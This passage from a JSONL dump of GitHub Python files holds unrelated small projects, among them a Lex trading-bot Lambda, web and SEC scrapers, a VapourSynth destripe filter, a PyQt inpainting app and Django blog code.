ec.presence_of_element_located(locator),\n message='Encerrado: página inicial não foi carregada.')\n\n time.sleep(2) # troca de tela\n","repo_name":"vinimaciel01-code/bbscrap","sub_path":"bbscrap/navegacao/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6852781042","text":"\"\"\"\nThis file makes the following benchmarking datasets:\n - steels\n\nFrom matminer's dataset library.\n\"\"\"\n\nfrom matminer.datasets.dataset_retrieval import load_dataset\n\n\nif __name__ == \"__main__\":\n df = load_dataset(\"steel_strength\")\n df = df[[\"formula\", \"yield strength\"]]\n df = df.rename(columns={\"formula\": \"composition\"})\n print(df)\n df.to_pickle(\"steels.pickle.gz\")\n","repo_name":"hackingmaterials/automatminer","sub_path":"automatminer_dev/matbench/steels.py","file_name":"steels.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"34"} +{"seq_id":"74062385376","text":"### Required Libraries ###\nfrom datetime import datetime\n### Required Libraries ###\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\n### Functionality Helper Functions ###\ndef parse_int(n):\n \"\"\"\n Securely converts a non-integer value to integer.\n \"\"\"\n try:\n return int(n)\n except ValueError:\n return float(\"nan\")\n\n\ndef build_validation_result(is_valid, violated_slot, message_content):\n \"\"\"\n Define a result message structured as Lex response.\n \"\"\"\n if message_content is None:\n return {\"isValid\": is_valid, \"violatedSlot\": violated_slot}\n\n return {\n \"isValid\": is_valid,\n \"violatedSlot\": violated_slot,\n \"message\": {\"contentType\": \"PlainText\", \"content\": message_content},\n }\n\ndef validate_data(age, investment_amount, intent_request):\n \"\"\"\n Validates the data provided by the user.\n \"\"\"\n\n # Validate that the user is over 18 years old\n if age is not None:\n age = parse_int(age)\n if age < 18:\n return build_validation_result(\n False,\n \"age\",\n \"You should be at least 18 years old to use this service, please provide a different age.\",\n )\n \n\n # Validate the investment amount, it should be > 1000\n if investment_amount is not None:\n investment_amount = parse_int(\n investment_amount\n ) \n # Since parameters are strings it's important to cast values\n if investment_amount <= 1000:\n return build_validation_result(\n False,\n \"InvestmentAmount\",\n \"The amount to invest should be greater than 1000, please provide a correct amount in USD.\",\n )\n\n # A True results is returned if age or amount are valid\n return build_validation_result(True, None, None)\n\n### Dialog Actions Helper Functions ###\ndef get_slots(intent_request):\n \"\"\"\n Fetch all the slots and their values from the current intent.\n \"\"\"\n return intent_request[\"currentIntent\"][\"slots\"]\n\n\ndef elicit_slot(session_attributes, intent_name, slots, slot_to_elicit, message):\n \"\"\"\n Defines an elicit slot type response.\n \"\"\"\n\n return {\n \"sessionAttributes\": session_attributes,\n \"dialogAction\": {\n \"type\": \"ElicitSlot\",\n \"intentName\": intent_name,\n \"slots\": slots,\n \"slotToElicit\": slot_to_elicit,\n \"message\": message,\n },\n }\n\n\ndef delegate(session_attributes, slots):\n \"\"\"\n Defines a delegate slot type response.\n \"\"\"\n\n return {\n \"sessionAttributes\": session_attributes,\n \"dialogAction\": {\"type\": \"Delegate\", \"slots\": slots},\n }\n\n\ndef close(session_attributes, fulfillment_state, message):\n \"\"\"\n Defines a close slot type response.\n \"\"\"\n\n response = {\n \"sessionAttributes\": session_attributes,\n \"dialogAction\": {\n \"type\": \"Close\",\n \"fulfillmentState\": fulfillment_state,\n \"message\": message,\n },\n }\n\n return response\n\n\n### Intents Handlers ###\ndef Cryptotrader(intent_request):\n \"\"\"\n Performs dialog management and fulfillment for Trading bot.\n \"\"\"\n\n first_name = get_slots(intent_request)[\"firstName\"]\n age = get_slots(intent_request)[\"age\"]\n investment_amount = get_slots(intent_request)[\"InvestmentAmount\"]\n value = get_slots(intent_request)[\"value\"]\n source = intent_request[\"invocationSource\"]\n\n if source == \"DialogCodeHook\":\n # Perform basic validation on the supplied input slots.\n # Use the elicitSlot dialog action to re-prompt\n # for the first violation detected.\n\n ### DATA VALIDATION CODE STARTS HERE ###\n validation_result = validate_data(age, investment_amount, intent_request)\n \n if not validation_result[\"isValid\"]:\n return elicit_slot( intent_request[\"sessionAttributes\"],\n intent_request[\"currentIntent\"][\"name\"],\n get_slots(intent_request),\n validation_result[\"violatedSlot\"],\n validation_result[\"message\"]\n )\n \n ### DATA VALIDATION CODE ENDS HERE ###\n\n # Fetch current session attibutes\n output_session_attributes = intent_request[\"sessionAttributes\"]\n\n return delegate(output_session_attributes, get_slots(intent_request))\n\n # Get the initial Crypro value recommendation\n\n ### Crypro value RECOMMENDATION CODE STARTS HERE ###\n\n if value == 'Ethereum':\n initial_recommendation = 'at $200 available on the model section of our website.'\n if value == 'Bitcoin':\n initial_recommendation ='at $200 available on the model section of our website.'\n\n \n ### Crypro value RECOMMENDATION CODE ENDS HERE ###\n\n\n # Return a message with the initial recommendation based on the value.\n return close(\n intent_request[\"sessionAttributes\"],\n \"Fulfilled\",\n {\n \"contentType\": \"PlainText\",\n \"content\": \"\"\"{} thank you for answering.\n Based on the value you selected, my recommendation is to purchase our Golden Cross Support vector machine model {}\n \"\"\".format(\n first_name, initial_recommendation\n ),\n },\n )\n\n \n### Intents Dispatcher ###\ndef dispatch(intent_request):\n \"\"\"\n Called when the user specifies an intent for this bot.\n \"\"\"\n\n intent_name = intent_request[\"currentIntent\"][\"name\"]\n\n # Dispatch to bot's intent handlers\n if intent_name == \"Cryptotrader\":\n return Cryptotrader(intent_request)\n\n raise Exception(\"Intent with name \" + intent_name + \" not supported\")\n\n\n### Main Handler ###\ndef lambda_handler(event, context):\n \"\"\"\n Route the incoming request based on intent.\n The JSON body of the request is provided in the event slot.\n \"\"\"\n\n return dispatch(event)","repo_name":"ijmelhorn/AWS-Bot-Trading-Algos","sub_path":"Trading Bot/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"72322644578","text":"import base64\nbase64_img=\"\"\n\nwith open('C:/Users/ace02/Desktop/Something/debai.png', 'rb') as binary_file:\n binary_file_data = binary_file.read()\n base64_encoded_data = base64.b64encode(binary_file_data)\n base64_message = base64_encoded_data.decode('utf-8')\n base64_img=base64_message\n print(\"Ok\")\n\n\nbase64_img_bytes = base64_img.encode('utf-8')\nwith open('decoded_image.png', 'wb') as file_to_save:\n decoded_image_data = base64.decodebytes(base64_img_bytes)\n file_to_save.write(decoded_image_data)\n\n#https://stackabuse.com/encoding-and-decoding-base64-strings-in-python/","repo_name":"duydung271/WebAI","sub_path":"ModelAPI/encode_decode_image.py","file_name":"encode_decode_image.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"29224429750","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom src.db import DB\nfrom src.db.links import Links\n\n\ndef spider(page_id):\n\n ''' Takes a page id, selects the url linked to page id and runs the scraper\n Scraper takes url and returns a list of urls scraped,\n a maximum of 10 links are inserted into the database '''\n\n if type(page_id) != int or page_id == 0:\n raise ValueError('Page Id is not valid')\n\n get_url = DB.pages().get_url(page_id)\n\n if get_url is None:\n return ValueError('Page Id not found')\n\n else:\n url = get_url[0]\n all_links = []\n\n # set is_scraping to True where id == page_id\n DB.pages().update_by_id(True, page_id)\n\n res = requests.get(url)\n soup = BeautifulSoup(res.text, 'html.parser')\n\n for link in soup.find_all('a', href=True):\n\n if link['href'].startswith('http'):\n all_links.append(link['href'])\n\n # check if page id is in already in links table, delete all data with page id\n DB.links().delete_by_page_id(page_id)\n\n for link in all_links[:10]:\n # Insert each link into the links table\n Links(DB().connect()).insert(page_id, link)\n\n # set is_scraping to False in where id == page_id\n DB.pages().update_by_id(False, page_id)\n\n","repo_name":"Resa-Obamwonyi/spider-pyapp","sub_path":"src/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"18337566699","text":"import numpy as np\n\nfrom kiox.episode import EpisodeManager\nfrom kiox.step import PartialStep, StepBuffer\nfrom kiox.transition import SimpleLazyTransition\nfrom kiox.transition_buffer import UnlimitedTransitionBuffer\n\n\nclass StepFactory:\n def __init__(\n self,\n observation_shape=(100,),\n action_type=\"continuous\",\n action_size=4,\n ):\n self.observation_shape = observation_shape\n self.action_type = action_type\n self.action_size = action_size\n\n def __call__(self, terminal=False):\n if self.action_type == \"continuous\":\n action = np.random.random(self.action_size)\n elif self.action_type == \"discrete\":\n action = np.random.randint(self.action_size)\n else:\n raise ValueError(f\"invalid action type: {self.action_type}\")\n\n if isinstance(self.observation_shape[0], int):\n observation = np.random.random(self.observation_shape)\n else:\n observation = [\n np.random.random(shape) for shape in self.observation_shape\n ]\n\n partial_step = PartialStep(\n observation=observation,\n action=action,\n reward=np.random.random(),\n terminal=1.0 if terminal else 0.0,\n )\n\n return partial_step\n\n def fill(self, n_steps):\n for _ in range(n_steps):\n self.__call__()\n\n\nclass TransitionFactory:\n def __init__(self, step_factory):\n self.step_factory = step_factory\n self.step_buffer = StepBuffer()\n self.episode_manager = EpisodeManager(\n self.step_buffer, UnlimitedTransitionBuffer()\n )\n self.prev_step = self.episode_manager.append_step(step_factory())\n\n def __call__(self, terminal=False):\n partial_step = self.step_factory()\n step = self.episode_manager.append_step(partial_step)\n transition = SimpleLazyTransition(\n self.prev_step.idx,\n None if terminal else step.idx,\n multi_step_reward=np.random.random(),\n duration=1,\n )\n self.prev_step = step\n return transition\n","repo_name":"takuseno/kiox","sub_path":"tests/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74176131937","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 27 17:53:16 2020\n\n@author: yuxinfan\n\"\"\"\n\nimport pandas as pd\nimport os\n\nos.getcwd()\nos.chdir(\"/Users/yuxinfan/471Project\")\n\n# input our htmlindex file generated from last step\npath='htmlindex.csv'\ndf=pd.read_csv(path)\ndataset = df.copy()\ndataset = dataset.dropna(subset=['Datelist'])\ndataset['year'] = pd.DatetimeIndex(dataset['Datelist']).year\ndataset['month'] = pd.DatetimeIndex(dataset['Datelist']).month\ndataset['day'] = pd.DatetimeIndex(dataset['Datelist']).day\ndataset = dataset[dataset.year != 2016]\ndataset = dataset[dataset.year != 2017]\n\n# Generate 10-K url \ndataset_10K = dataset[dataset['Typelist'] == '10-K']\nurllist = []\n\nfor num in range(0,len(dataset_10K['Htmllist'])):\n print(num)\n index = list(dataset_10K['Htmllist'])[num]\n CIK = list(dataset_10K['CIKlist'])[num]\n Filing = index.split(\"|\")\n for item in Filing:\n if 'html' in item:\n report = item\n url = 'https://www.sec.gov/Archives/' + report\n df1 = pd.read_html(url)\n document_index = df1[0]\n document_index = document_index.dropna(subset=['Type'])\n document_name = document_index[document_index['Type'].str.contains('10-K')]\n document_name = document_name['Document'].str.split(' ')\n document_name = document_name[0][0]\n report_formatted = report.replace('-','').replace('index.html','')\n url = 'https://www.sec.gov/Archives/' + report_formatted + '/' + document_name\n urllist.append(url)\n\ndataset_10K['urllist'] = urllist\n\n\n\n \n\n \n \n \n \n \n \n \n \n \n \n \n \n","repo_name":"yx-fan/Sentimental_analysis_in_stock_trading","sub_path":"PythonCode/P2.py","file_name":"P2.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5655575156","text":"import vapoursynth as vs\r\nfrom functools import partial\r\nfrom typing import Callable, List, Union\r\ncore = vs.core\r\n\r\ndef Destripe(clip: vs.VideoNode,\r\n width: int = 1280,\r\n height: int = 360,\r\n kernel: str = 'bicubic',\r\n b: float = 0,\r\n c: float = 1/2,\r\n taps: int = 3,\r\n src_left: Union[float, List[float]] = [0.0, 0.0],\r\n src_top: Union[float, List[float]] = [0.0, 0.0],\r\n src_width: Union[float, List[float]] = [0.0, 0.0],\r\n src_height: Union[float, List[float]] = [0.0, 0.0],\r\n fix_top: Union[int, List[int]] = [0, 0],\r\n fix_bottom: Union[int, List[int]] = [0, 0],\r\n showdiff: bool = False) -> Union[vs.VideoNode, List[vs.VideoNode]]:\r\n y = clip if clip.format.color_family == vs.GRAY else core.std.ShufflePlanes(clip, 0, vs.GRAY)\r\n kernel = kernel.lower()\r\n if kernel.startswith('de'):\r\n kernel = kernel[2:]\r\n if not isinstance(src_left, list):\r\n src_left = [src_left, src_left]\r\n if not isinstance(src_top, list):\r\n src_top = [src_top, src_top]\r\n if not isinstance(src_width, list):\r\n src_width = [src_width, src_width]\r\n src_width = [width if v <= 0 else v for v in src_width]\r\n if not isinstance(src_height, list):\r\n src_height = [src_height, src_height]\r\n src_height = [height if v <= 0 else v for v in src_height]\r\n if not isinstance(fix_top, list):\r\n fix_top = [fix_top, fix_top]\r\n if not isinstance(fix_bottom, list):\r\n fix_bottom = [fix_bottom, fix_bottom]\r\n\r\n isfloat = (y.format.sample_type == vs.FLOAT and y.format.bits_per_sample == 32)\r\n sep = core.std.SeparateFields(y, True).std.SetFrameProp('_Field', delete=True)\r\n st = sep[0::2]\r\n sb = sep[1::2]\r\n if fix_top[0] > 0 or fix_bottom[0] > 0:\r\n st16 = core.resize.Point(st, format=vs.GRAY16, dither_type='error_diffusion')\r\n st32 = core.edgefixer.Continuity(st16, top=fix_top[0], bottom=fix_bottom[0]).resize.Point(format=vs.GRAYS)\r\n elif isfloat:\r\n st32 = st\r\n else:\r\n st32 = core.resize.Point(st, format=vs.GRAYS)\r\n if fix_top[1] > 0 or fix_bottom[1] > 0:\r\n sb16 = core.resize.Point(sb, format=vs.GRAY16, dither_type='error_diffusion')\r\n sb32 = core.edgefixer.Continuity(sb16, top=fix_top[1], bottom=fix_bottom[1]).resize.Point(format=vs.GRAYS)\r\n elif isfloat:\r\n sb32 = sb\r\n else:\r\n sb32 = core.resize.Point(sb, format=vs.GRAYS)\r\n\r\n if showdiff:\r\n downt, difft = _Descale(st32, width, height, kernel, b, c, taps, src_left[0], src_top[0], src_width[0], src_height[0], True)\r\n downb, diffb = _Descale(sb32, width, height, kernel, b, c, taps, src_left[1], src_top[1], src_width[1], src_height[1], True)\r\n down = _Weave(downt, downb)\r\n diff = _Weave(difft, diffb)\r\n if isfloat:\r\n return [down, diff]\r\n else:\r\n downi = core.resize.Point(down, format=y.format, dither_type='error_diffusion')\r\n diffi = core.resize.Point(diff, format=y.format, range_in_s='limited', range_s='full')\r\n return [downi, diffi]\r\n else:\r\n downt = _Descale(st32, width, height, kernel, b, c, taps, src_left[0], src_top[0], src_width[0], src_height[0], False)\r\n downb = _Descale(sb32, width, height, kernel, b, c, taps, src_left[1], src_top[1], src_width[1], src_height[1], False)\r\n down = _Weave(downt, downb)\r\n if isfloat:\r\n return down\r\n else:\r\n downi = core.resize.Point(down, format=y.format, dither_type='error_diffusion')\r\n return downi\r\n\r\ndef _Weave(clipa: vs.VideoNode, clipb: vs.VideoNode) -> vs.VideoNode:\r\n clip = core.std.Interleave([clipa, clipb])\r\n wv = core.std.DoubleWeave(clip, True)[0::2]\r\n return wv.std.SetFrameProp('_FieldBased', intval=0)\r\n\r\ndef _GetDescaler(kernel: str,\r\n b: float,\r\n c: float,\r\n taps: int,\r\n src_left: float,\r\n src_top: float,\r\n src_width: float,\r\n src_height: float) -> Callable[[vs.VideoNode, int, int], vs.VideoNode]:\r\n if kernel == 'bilinear':\r\n return partial(core.descale.Debilinear, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'bicubic':\r\n return partial(core.descale.Debicubic, b=b, c=c, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'lanczos':\r\n return partial(core.descale.Delanczos, taps=taps, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'spline16':\r\n return partial(core.descale.Despline16, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'spline36':\r\n return partial(core.descale.Despline36, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'spline64':\r\n return partial(core.descale.Despline64, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n else:\r\n raise ValueError('descale: Invalid kernel specified.')\r\n\r\ndef _GetResizer(kernel: str,\r\n b: float,\r\n c: float,\r\n taps: int,\r\n src_left: float,\r\n src_top: float,\r\n src_width: float,\r\n src_height: float) -> Callable[[vs.VideoNode, int, int], vs.VideoNode]:\r\n if kernel == 'bilinear':\r\n return partial(core.resize.Bilinear, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'bicubic':\r\n return partial(core.resize.Bicubic, filter_param_a=b, filter_param_b=c, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'lanczos':\r\n return partial(core.resize.Lanczos, filter_param_a=taps, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'spline16':\r\n return partial(core.resize.Spline16, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'spline36':\r\n return partial(core.resize.Spline36, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n elif kernel == 'spline64':\r\n return partial(core.resize.Spline64, src_left=src_left, src_top=src_top, src_width=src_width, src_height=src_height)\r\n else:\r\n raise ValueError('resize: Invalid kernel specified.')\r\n\r\ndef _Descale(clip: vs.VideoNode,\r\n width: int,\r\n height: int,\r\n kernel: str,\r\n b: float,\r\n c: float,\r\n taps: int,\r\n src_left: float,\r\n src_top: float,\r\n src_width: float,\r\n src_height: float,\r\n showdiff: bool) -> Union[vs.VideoNode, List[vs.VideoNode]]:\r\n descaler = _GetDescaler(kernel, b, c, taps, src_left, src_top, src_width, src_height)\r\n down = descaler(clip, width, height)\r\n if showdiff:\r\n resizer = _GetResizer(kernel, b, c, taps, src_left, src_top, src_width, src_height)\r\n up = resizer(down, clip.width, clip.height)\r\n diff = core.std.Expr([clip, up], 'x y - abs')\r\n return [down, diff]\r\n else:\r\n return down\r\n","repo_name":"ChihayaLab/VapourSynth-Destripe","sub_path":"destripe.py","file_name":"destripe.py","file_ext":"py","file_size_in_byte":7443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"114438642","text":"from applications.DataFacadeOOB.code.ActionDefinition.analyze_trends.python.ExecutionHandler import ExecutionHandler\n\nfrom tests.helpers import load_data\n\n\ndef test_analyze_trends():\n handler = ExecutionHandler()\n inp = load_data(\"iris.csv\")\n result = handler.execute(data=inp, dim_columns=[\"species\"], target_col=\"sepal_length\", agg_function=\"sum\")\n assert result is not None\n","repo_name":"sb-datafacade/df-lib","sub_path":"old/tests/tests_common_actions/test_analyze_trends.py","file_name":"test_analyze_trends.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26722487688","text":"import sys\nfrom typing import Optional\nfrom PyQt5.QtCore import Qt, QSize, QTimer\nfrom PyQt5.QtGui import QColor, QFont, QImage, QPainter, QPixmap, QMovie\nfrom PyQt5.QtWidgets import (\n QApplication,\n QComboBox,\n QFileDialog,\n QGridLayout,\n QLabel,\n QMainWindow,\n QPushButton,\n QStatusBar,\n QWidget,\n)\nfrom app.inpaint import inpaint_algorithms, file_has_graphic_extension, cv, np\nfrom threading import Thread\n\nCOMBO_MAP = {\n 'Skimage-biharmonic': 5,\n 'OpenCV-Shiftmap': 4,\n 'OpenCV-NS': 0,\n 'OpenCV-TELEA': 1,\n 'OpenCV-FSR fast': 2,\n 'OpenCV-FSR best': 3,\n}\n\n\nclass ImageLabel(QLabel):\n def __init__(self):\n super().__init__()\n self.setAlignment(Qt.AlignCenter)\n self.setText('Drop image to inpaint here')\n self.setStyleSheet('''QLabel{border: 4px dashed #aaa}''')\n\n\nclass Canvas(QLabel):\n def __init__(self, w, h):\n super().__init__()\n self.mask_array = np.zeros(shape=(h, w, 1), dtype=np.uint8)\n pixmap = QPixmap(w, h)\n pixmap.fill(Qt.transparent)\n self.setPixmap(pixmap)\n\n self.last_x, self.last_y = None, None\n self.pen_color = Qt.white\n\n def set_pen_color(self, c):\n self.pen_color = QColor(c)\n\n def mouseMoveEvent(self, e):\n if self.last_x is None: # First event.\n self.last_x = e.x()\n self.last_y = e.y()\n return # Ignore the first time.\n\n painter = QPainter(self.pixmap())\n painter.setOpacity(0.2)\n p = painter.pen()\n p.setWidth(7)\n p.setColor(self.pen_color)\n painter.setPen(p)\n painter.drawLine(self.last_x, self.last_y, e.x(), e.y())\n painter.end()\n self.update()\n try:\n self.mask_array[self.last_y, self.last_x] = 255\n self.mask_array[e.y(), e.x()] = 255\n except IndexError:\n pass\n\n # Update the origin for next time.\n self.last_x = e.x()\n self.last_y = e.y()\n\n def mouseReleaseEvent(self, e):\n self.last_x = None\n self.last_y = None\n\n\nclass MainWindow(QMainWindow):\n path_original: Optional[str] = \"\"\n path_mask: Optional[str] = \"\"\n path_saving: Optional[str] = \"\"\n img_inpainted = None\n img_mask = None\n canvas = None\n\n def __init__(self):\n super().__init__(parent=None)\n self.setWindowTitle(\"Inpaint app\")\n self.resize(1024, 600)\n self.setAcceptDrops(True)\n # initialize ui fields\n self.drag_image = ImageLabel()\n self.image_after = QLabel(\"After inpaint the result will be displayed here\")\n self.image_after.setAlignment(Qt.AlignCenter)\n self.btn_inpaint = QPushButton(\"Make inpaint with specified algorithm:\")\n self.btn_inpaint.clicked.connect(self.inpaint_click)\n self.btn_mask = QPushButton(\"Upload proper mask for image\")\n self.btn_mask.clicked.connect(self.mask_click)\n self.btn_save = QPushButton(\"Save inpainted image\")\n self.btn_save.clicked.connect(self.save_click)\n self.combobox_inpaint = QComboBox()\n self.combobox_inpaint.addItems(COMBO_MAP.keys())\n self.btn_add_mask = QPushButton(\"Manually create mask on current image (not recommended)\")\n self.btn_add_mask.clicked.connect(self.add_mask_click)\n self.btn_upload_mask = QPushButton(\"Upload mask added manually (not recommended)\")\n self.btn_upload_mask.clicked.connect(self.upload_mask_click)\n self.movie = QMovie(\"../assets/loading.gif\")\n self.loading_gif = QLabel()\n self.loading_gif.setMovie(self.movie)\n self.loading_gif.setAlignment(Qt.AlignCenter)\n # set layout and widgets\n self.layout = QGridLayout()\n self.widget = QWidget()\n self.layout.addWidget(self.btn_inpaint, 0, 0)\n self.layout.addWidget(self.combobox_inpaint, 0, 1)\n self.layout.addWidget(self.btn_mask, 1, 0)\n self.layout.addWidget(self.btn_save, 1, 1)\n self.layout.addWidget(self.drag_image, 2, 0)\n self.layout.addWidget(self.image_after, 2, 1)\n self.layout.addWidget(self.loading_gif, 2, 1)\n self.layout.addWidget(self.btn_add_mask, 3, 0)\n self.layout.addWidget(self.btn_upload_mask, 3, 1)\n self.widget.setLayout(self.layout)\n\n self.setCentralWidget(self.widget)\n self.create_menu()\n self.statusBar().setStyleSheet(\"background-color : #e6e6e6; border :1px inset #c7c7c7;\")\n\n def create_menu(self):\n menu = self.menuBar().addMenu(\"&Menu\")\n help = self.menuBar().addMenu(\"Help\")\n menu.addAction(\"&Exit\", self.close)\n # help.addAction()\n\n def _createStatusBar(self):\n self.status_bar = QStatusBar()\n self.setStatusBar(self.status_bar)\n\n def display_status_bar_message(self, message):\n self.statusBar().showMessage(message)\n self.statusBar().show()\n QTimer.singleShot(5000, self.statusBar().clearMessage)\n\n def dragEnterEvent(self, event):\n if event.mimeData().hasImage:\n event.accept()\n else:\n event.ignore()\n\n def dragMoveEvent(self, event):\n if event.mimeData().hasImage:\n event.accept()\n else:\n event.ignore()\n\n def dropEvent(self, event):\n if event.mimeData().hasImage:\n event.setDropAction(Qt.CopyAction)\n file_path = event.mimeData().urls()[0].toLocalFile()\n if not file_has_graphic_extension(file_path):\n self.display_status_bar_message(\"File must have graphic extension like .png\")\n return\n self.path_original = file_path\n self.set_image(file_path)\n if self.canvas:\n self.canvas.close()\n self.canvas = None\n self.img_mask = None\n event.accept()\n else:\n event.ignore()\n\n def set_image(self, file_path):\n image = QPixmap(file_path)\n image = image.scaled(512, 512, Qt.KeepAspectRatio, Qt.FastTransformation)\n self.drag_image.setPixmap(image)\n\n def movie_start(self):\n self.display_status_bar_message(\"Loading\")\n self.movie.setScaledSize(QSize().scaled(150, 150, Qt.KeepAspectRatio))\n self.movie.start()\n self.loading_gif.show()\n self.image_after.setText(\"\")\n\n def movie_stop(self):\n self.movie.stop()\n self.loading_gif.hide()\n self.image_after.show()\n self.display_status_bar_message(\"Inpainted successfully\")\n\n def inpaint_click(self):\n if self.path_original and (self.path_mask or self.img_mask is not None):\n self.movie_start()\n thread = Thread(target=self.inpaint_operation)\n thread.start()\n elif not self.path_original:\n self.display_status_bar_message(f\"Please upload image to inpaint\")\n else:\n self.display_status_bar_message(f\"Please upload mask of image to inpaint\")\n\n def inpaint_operation(self):\n inpaint_flag = COMBO_MAP[self.combobox_inpaint.currentText()]\n try:\n self.img_inpainted = inpaint_algorithms(\n img_path=self.path_original,\n mask_path=self.path_mask if self.path_mask else None,\n img_mask=self.img_mask,\n flag=inpaint_flag,\n )\n except Exception as e:\n self.image_after.hide()\n self.display_status_bar_message(f\"Error while inpainting: {e}\")\n finally:\n self.movie_stop()\n image_after = QImage(\n self.img_inpainted,\n self.img_inpainted.shape[1],\n self.img_inpainted.shape[0],\n self.img_inpainted.shape[1] * 3,\n QImage.Format_RGB888\n )\n pixmap_img_after = QPixmap(image_after)\n pixmap_img_after = pixmap_img_after.scaled(512, 512, Qt.KeepAspectRatio, Qt.FastTransformation)\n self.image_after.setPixmap(pixmap_img_after)\n\n def mask_click(self):\n mask_path, _ = QFileDialog.getOpenFileName(self, \"Select mask for image\", self.path_original, \"All Files (*)\")\n if mask_path:\n if not file_has_graphic_extension(mask_path):\n self.display_status_bar_message(\"File must have graphic extension like .png\")\n return\n self.path_mask = mask_path\n self.btn_mask.setText(\"Replace loaded mask\")\n\n def save_click(self):\n if self.img_inpainted is None:\n self.display_status_bar_message(f\"You must make proper inpaint first\")\n return\n path_saving = QFileDialog.getSaveFileName(\n self,\n \"Save inpainted image\",\n f\"{self.path_original}/inpainted_image\",\n \"All Files (*)\"\n )\n if path_saving[0]:\n try:\n cv.imwrite(f'{path_saving[0]}.jpg', cv.cvtColor(self.img_inpainted, cv.COLOR_BGR2RGB))\n self.display_status_bar_message(f\"Successfully saved in {path_saving[0]}\")\n except Exception as e:\n self.display_status_bar_message(f\"Error while saving: {e}\")\n\n def add_mask_click(self):\n if not self.path_original:\n self.display_status_bar_message(\"First you need to add image to inpaint\")\n return\n elif self.canvas:\n self.canvas.close()\n self.canvas = None\n self.canvas = Canvas(self.drag_image.width(), self.drag_image.height())\n self.layout.addWidget(self.canvas, 2, 0, alignment=Qt.AlignCenter)\n self.combobox_inpaint.setCurrentIndex(1)\n\n def upload_mask_click(self):\n if self.canvas is None:\n self.display_status_bar_message('Before uploading mask you must create it ')\n return\n self.img_mask = self.canvas.mask_array\n if self.path_mask:\n self.path_mask = \"\"\n self.btn_mask.setText(\"Replace loaded mask\")\n self.display_status_bar_message('Uploaded created mask to memory. See results with \"Make inpaint\" button')\n","repo_name":"radek-szpot/inpaint","sub_path":"app/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":10067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"16165469585","text":"from django.urls import path\nfrom .views import PostsListView, PostDetailView, PostCreateView, PostUpdateView, PostDeleteView\n\nurlpatterns = [\n path('posts/', PostsListView.as_view(), name='posts_list_url'),\n path('post/create/', PostCreateView.as_view(), name='post_create_url'),\n path('post//', PostDetailView.as_view(), name='post_detail_url'),\n path('post//update/', PostUpdateView.as_view(), name='post_update_url'),\n path('post//delete/', PostDeleteView.as_view(), name='post_delete_url'),\n]\n","repo_name":"leondav1/django_blog","sub_path":"app_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72327049378","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\n\nfrom .models import Comment, Webpage, Template, User\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n fields = ['title', 'content']\n\n\nclass WebpageForm(forms.ModelForm):\n class Meta:\n model = Webpage\n fields = [\n 'name', 'template_used', 'user_title',\n 'user_text_1', 'user_text_2', 'user_text_3',\n 'user_image_1', 'user_image_2', 'user_image_3'\n ]\n\n\nclass TemplateForm(forms.ModelForm):\n class Meta:\n model = Template\n fields = ['name', 'style_sheet']\n\n\nclass UserRegisterForm(UserCreationForm):\n email = forms.EmailField()\n\n class Meta:\n model = User\n fields = ['username', 'email', 'password1', 'password2']\n","repo_name":"python-discord/summer-code-jam-2020","sub_path":"jolly-jellyfish/src/page_maker/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"34"} +{"seq_id":"33950208342","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib.auth import get_user_model\nfrom django.db import migrations\n\n\ndef add_data(apps, schema):\n User = get_user_model()\n User.objects.create_superuser('admin', 'admin@example.com', 'admin')\n\n ExampleModel = apps.get_model('tests', \"ExampleModel\")\n for i in range(10):\n ExampleModel.objects.create(title=\"example {}\".format(i))\n\n\nclass 